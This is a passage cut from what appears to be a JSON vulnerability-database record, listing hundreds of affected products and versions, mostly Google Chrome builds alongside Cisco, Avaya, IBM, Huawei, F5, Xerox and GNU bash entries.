"google", "version": "4.0.223.4" }, { "model": "enterprise linux long life server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.6" }, { "model": "ios-xe for catalyst 3k", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.123" }, { "model": "gaia embedded r71.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7830" }, { "model": "system networking san96b-5 2498-f96", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.103" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.757.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.40" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8900" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.832.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1066.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.50" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.316" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.1" }, { "model": "rack server rh5885h v100r003c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.221.8" }, { "model": "ipso r75.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.403.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.0" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1018.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1278.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.229" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.146" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.139" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1282.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.303.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.4" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "gaia embedded r71.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.26" }, { "model": "aura communication manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.51" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.21" }, { "model": "elog v200r003c10spc202", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e9000 blade server ch121 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.436.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.21" }, { "model": "totalstorage san16b-2 fabric switch 2005-b16", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1030.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.340" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.45" }, { "model": "move", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.2" }, { "model": "uma v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.81" }, { "model": "aura communication manager ssp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.343" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.679.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.38" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.103" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.644.0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.70" }, { "model": "network configuration and change management", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "associates customer experience manager transaction impact monitor", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "ip deskphones", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.17" }, { "model": "totalstorage san256b director model m48 2109-m48", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.81" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.313.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.351.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.10" }, { "model": "gaia os r76.0", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "oceanstor s5800t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ipso r75.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.887.0" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "advanced threat defense", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "workcentre r14-10 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7755061.090.224.30300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.23" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.1" }, { "model": "exalogic", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "oceanstor uds v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.36" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.793.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.1" }, { "model": "vcenter site recovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.71" }, { "model": "system storage san24b-4 2498-b24", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.29" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core pb25", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1043.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1000.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.317" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.909.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.14" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "36550" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.318" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.115" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.488.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.526.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.56" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "nsx for multi-hypervisor", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0.3" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.808.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.287.0" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.584.0" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1042.0" }, { "model": "bash rc1", "scope": "eq", "trust": 0.3, "vendor": "gnu", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.33" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.907.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.120" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7232" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.29" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.25" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.81" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.823.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.791.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.577.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.8" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "oceanstor s5800t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.91" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "workcentre r15-03 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7765061.090.225.06200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.676.0" }, { "model": "virtual library system", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.525.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.10" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.681.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.309" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.97" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.214" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "oceanstor s6900 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1050" }, { "model": "storeonce gen backup software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "22.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.135" }, { "model": "oceanstor css v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.11" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.950.0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": 